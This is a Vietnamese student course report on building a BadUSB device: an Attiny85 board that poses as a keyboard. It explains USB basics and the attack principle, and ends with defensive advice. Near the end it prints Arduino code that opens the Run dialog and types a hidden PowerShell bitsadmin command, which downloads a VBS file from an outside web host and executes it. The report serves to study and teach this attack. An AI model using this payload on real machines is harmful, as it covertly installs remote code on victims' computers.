USB (Universal Serial Bus) là một chuẩn kết nối tuần tự đa dụng trong máy tính. USB sử dụng để kết nối các thiết bị ngoại vi với máy tính, chúng thường được thiết kế dưới dạng các đầu cắm cho các thiết bị tuân theo chuẩn cắmvàchạy mà với tính năng cắm nóng thiết bị (nối và ngắt các thiết bị không cần phải khởi động lại hệ thống).
Trang 1TRƯỜNG ĐẠI HỌC CÔNG NGHỆ THÔNG TIN
KHOA MẠNG MÁY TÍNH VÀ TRUYỀN THÔNG
BÁO CÁO ĐỒ ÁN
TẠO USB ĐỘC HẠI
MÔN HỌC: CƠ CHẾ HOẠT ĐỘNG CỦA MÃ ĐỘC
MÃ LỚP: NT130.H21.ANTT
Các thành viên trong nhóm:
1 Đoàn Thành An – 14520003
2 Nguyễn Quốc Chí – 14520084
3 Huỳnh Tấn Duy – 14520214
4 Đỗ Bá Tứ Mỹ – 14520541
5 Bùi Minh Thái – 14520812
6 Nguyễn Hoàng Thanh –
14520842
GV Lý Thuyết: Phạm Văn Hậu
Trang 2MỤC LỤC
I TỔNG QUAN VỀ USB:
USB (Universal Serial Bus) là một chuẩn kết nối tuần tự đa dụng trong máy tính USB sử dụng để kết nối các thiết bị ngoại vi với máy tính, chúng thường được thiết kế dưới dạng các đầu cắm cho các thiết bị tuân theo chuẩn cắm-và-chạy mà với tính năng
cắm nóng thiết bị (nối và ngắt các thiết bị không cần phải khởi động lại hệ thống)
Trang 3Đặc trưng USB:
• Cho phép mở rộng đến 127 thiết bị
• Dùng nguồn 5v
• Những thiết bị USB có đặc tính cắm nóng, điều này có nghĩa các thiết bị có thể được kết nối (cắm vào) hoặc ngắt kết nối (rút ra) trong mọi thời điểm mà người
sử dụng cần mà không cần phải khởi động lại hệ thống
• Nhiều thiết bị USB có thể được chuyển vềtrạng thái tạm ngừng hoạt động khi máy tính chuyển sang chế độ tiết kiệm điện
Các thiết bị hoặc phương thức hỗ trợ giao tiếp USB:
• Chuột
• Bàn phím
• Máy in
• Máy quét
• Xbox one
• Webcam
• Modem
• Loa
• Usb flash
• Ổ cứng gắn ngoài
• USB to serial
• Bộ chuyển đổi cổng
II USB ĐỘC HẠI – BAD USB:
1 Nguyên lý:
Trang 4Thông thường trên window để gọi nhanh một ứng dụng sẵn có thì chúng ta hay
dùng tổ hợp phím Window + R (hình II.1.1) để chạy lên hộp thoại Run (hình dưới II.1.2) Có được hộp thoại này thì chúng ta có thể chạy chương trình mong muốn
Hình II.1.1
Hình II.1.2 Nhưng nếu kết hợp cách trên cùng với một bàn phím ảo có chức năng tự động gửi những đoạn code có chức năng đặc biệt thì ta dễ dàng tấn công vào máy tính nạn nhân
Tóm lại, chúng ta cần một bàn phím ảo tự động với các bước:
• B1: Kết nối máy tính với bàn phím ảo
• B2: Nhấn tổ hợp phím Window + R Chờ hiện hộp thoại Run
• B3: Gửi shell code đến hộp thoại Run, nhấn nút OK
• B4: Ngắt kết nối bàn phím ảo với máy tính
Trang 52 Hiện thực bàn phím ảo:
• Lựa chọn phần cứng: ở đây phần cứng rất đa dạng arduino có hỗ trợ bàn phím như Arduino Pro Micro hoặc các dòng chíp Avr thì có thư viện V-USB Đơn
giản hơn thì có Arduino Attiny85 Usb ( Avr Attiny85 có cài đặt sẵn thư viện
keyboard giao tiếp qua cổng usb nhờ thư viện V-USB – Giá khá rẻ 40 nghìn – Hình II.2.1)
Hình II.2.1
Trang 6• Shell code:
3 Demo:
III TỔNG KẾT:
Qua những điều vừa mới giới thiệu thì hiểm họa về tấn công vật lý ở đây là giao tiếp qua cổng USB ngày càng nguy hiểm Vậy để phòng tránh thì cần làm:
• Disable các cổng usb nếu không sử dụng chúng
• Ngăn cấm mọi người có ý định cắm usb mà không có sự cho phép
• Sau khi cắm usb vào mà có điều gì bất thường ví dụ hiện hộp thoại Run lên thì cần rút usb ra ngay lập tức vì đó là usb giả mạo bàn phím
Delay(3000); Sau khi cắn usb keyboard vào thì đợi cho hệ điều hành nhận diện Keyboard.pressKey(GUI, 'r'); Tiếp theo usb keyboard sẽ tự gửi tổ hợp phím win + R Keyboard.releaseKey(); Nhả phím
Delay(1500); Đợi 1,5 giây hiện hộp thoại Run
Keyboard.print("powershell -NoP -W Hidden bitsadmin /TRANSFER 'a'
http://vt57.000webhostapp.com/a '%tmp%\a.vbs';Start-Process %tmp%\a.vbs"); Gửi lệnh trên đến hộp thoại Run Các tham số:
• -W hidden ẩn powershell
• bitsadmin /tranfer 'a' http://vt57.000webhostapp.com/a '%tmp%\a.vbs'
download tệp tin a trên internet về và lưu lại ở thư mục tạm với tên a.vbs
• Start-Process %tmp%\a.vbs chạy tệp tin a.vbs vừa download về
Keyboard.pressSpecialKey(ENTER); Nhấn phím enter mặc định là ấn button OK trên hộp thoại Run
Keyboard.releaseKey(); Nhả phím
Trang 7• Theo dõi trạng thái máy tính từ khi cắm usb vào.
• Sạc dự phòng, điện thoại , bàn phím, chuột, webcam đều có thể là các usb độc hại làm giả rất dễ, như hình II.2.1 nó nhỏ như 1 đồng xu
• Cài đặt Antivirus, tường lửa, chương trình bảo vệ usb